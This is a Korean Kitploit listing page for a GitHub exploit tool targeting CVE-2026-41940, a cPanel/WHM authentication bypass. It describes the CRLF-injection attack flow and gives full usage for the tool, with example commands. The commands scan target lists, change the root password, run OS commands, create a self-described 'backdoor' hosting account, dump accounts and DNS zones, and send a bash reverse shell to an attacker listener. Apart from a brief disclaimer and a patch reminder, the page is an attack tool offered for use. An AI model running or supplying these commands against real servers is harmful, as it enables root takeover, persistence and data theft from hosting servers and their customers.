Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940 — cPanel/WHM 인증 우회 (제로데이 취약점) | Kitploit
도구/GitHubGitHub/christian93111/cve-2026-41940
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlAuthenticationLearning & EducationRed TeamingPayload Development
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM 인증 우회 (제로데이 취약점)

10243개월 전아직 검토되지 않음
저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41940: cPanel/WHM 인증 우회 (단일 및 다중 대상)

고지사항: 이 문서와 관련 스크립트(exploit.py)는 교육 목적, 보안 연구 및 승인된 침투 테스트용으로만 제공됩니다. 이 소프트웨어를 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 사용하지 마십시오.

개요

exploit.py는 cPanel 및 WHM의 인증 우회 취약점(CVE-2026-41940)을 시연하는 스크립트입니다. 이 취약점은 CRLF 주입 결함을 통해 인증되지 않은 공격자가 루트 세션을 데몬 캐시에 주입하여, 유효한 자격 증명 없이도 루트 수준의 WHM 액세스 권한을 부여합니다.

취약점 분석 및 익스플로잇 흐름

이 익스플로잇은 Basic Authentication 처리 메커니즘 내의 CRLF(Carriage Return Line Feed) 주입 취약점과 세션 전파 결함을 결합하여 작동합니다. 스크립트는 다음 4단계로 공격을 자동화합니다:

  1. 사전 인증 세션 생성: 공용 로그인 엔드포인트(예: /login/ 또는 /cgi/login.cgi)에 연결하여 기본적인 인증되지 않은 세션 쿠키(whostmgrsession)를 획득합니다.
  2. CRLF 주입: Base64로 인코딩된 페이로드가 포함된 조작된 Basic Authentication 헤더를 전송하여 루트 세션 필드를 cpsrvd 세션 캐시에 직접 주입합니다. 서버의 리디렉션 응답은 생성된 보안 토큰()을 노출합니다.
cpsess
  • 세션 전파: 원시 세션 쿠키가 인증된 WHM 엔드포인트로 전송되어 do_token_denied가 위조된 세션을 데몬 캐시에 전파하도록 트리거하여 유효한 인증 세션으로 만듭니다.
  • 확인: 위조된 세션을 사용하여 제한된 WHM API 엔드포인트(예: /json-api/version)에 접근하여 루트 수준 액세스를 확인합니다.

  • 전제 조건

    • Python 3.x
    • requests 라이브러리
    root@kitploit:~
    pip install requests
    

    사용법

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    인수

    대상 선택

    인수설명
    --target URL단일 WHM URL (예: https://target:2087)
    --target-file FILE대상이 포함된 파일 (한 줄에 하나의 ip:port) — 자동으로 확인 모드 활성화

    네트워크 및 핵심 옵션

    인수설명
    --threads N다중 대상 모드에서의 동시 스레드 (기본값: 10)
    --hostname HOSTHost 헤더 재정의 — 자동 검색 실패 또는 잘못된 호스트명 발견 시 사용
    --timeout N요청당 제한 시간(초) (기본값: 15)
    --retries N네트워크 오류 발생 시 재시도 횟수 (기본값: 3)
    --cookie-name NAME특정 세션 쿠키 이름 강제 지정 (생략 시 자동 감지)
    --no-verify4단계 확인을 건너뛰고 계속 진행

    익스플로잇 옵션 (우회 후)

    인수설명
    --check확인 전용 모드 — 취약점을 악용하지 않고 확인만 수행 (--target-file과 함께 자동 설정)
    --password PASS루트 비밀번호를 PASS로 변경
    --api FUNC특정 WHM JSON-API 함수 호출
    --api-params K=V,...--api에 전달할 쉼표로 구분된 매개변수
    --exec CMDWHM scripts/run_script를 통해 OS 명령 실행 (대체: rawexec)
    --session루트 원클릭 로그인 URL 생성 — 즉시 열기, 토큰이 빠르게 만료됨
    --shell대화형 WHM 셸 진입 (단일 대상 전용)
    --dump서버 정보 덤프: 버전, 계정, DNS 영역, 권한
    --add-user USER PASS DOMAIN새 cPanel 호스팅 계정 생성
    --revshell LHOST LPORT리스너로 bash 리버스 셸 전송

    출력 옵션

    인수설명
    --output FILE세션 토큰 및 세부 정보를 JSON 파일로 저장

    예제

    root@kitploit:~
    # Check if target is vulnerable
    python exploit.py --target https://target:2087 --check
    
    # Dump server info (version, accounts, privileges)
    python exploit.py --target https://target:2087 --dump
    
    # Generate a one-click root login URL (paste in browser immediately)
    python exploit.py --target https://target:2087 --session
    
    # Execute a command
    python exploit.py --target https://target:2087 --exec "id"
    
    # Drop into an interactive WHM shell
    python exploit.py --target https://target:2087 --shell
    
    # Change root password
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # Call WHM API directly
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # Create a backdoor cPanel account
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # Send reverse shell
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # Override hostname (use when auto-discovery fails)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # Scan multiple targets (check-only mode)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # Save session to file
    python exploit.py --target https://target:2087 --dump --output results.json
    

    대화형 셸 명령어

    --shell 사용 시 다음 명령어를 사용할 수 있습니다:

    명령어설명
    api <function> [k=v ...]WHM JSON-API 함수 호출 (예: api version)
    exec <command>WHM을 통해 OS 명령 실행 (예: exec id)
    passwd <newpass>루트 비밀번호 변경
    dump서버 정보 덤프
    revshell <lhost> <lport>리버스 셸 전송
    add <user> <pass> <domain>cPanel 계정 생성
    save <path>현재 세션을 파일로 저장
    exit / quit셸 종료

    주의사항

    최신 cPanel/WHM 보안 패치를 즉시 업데이트하십시오.

    도구 다운로드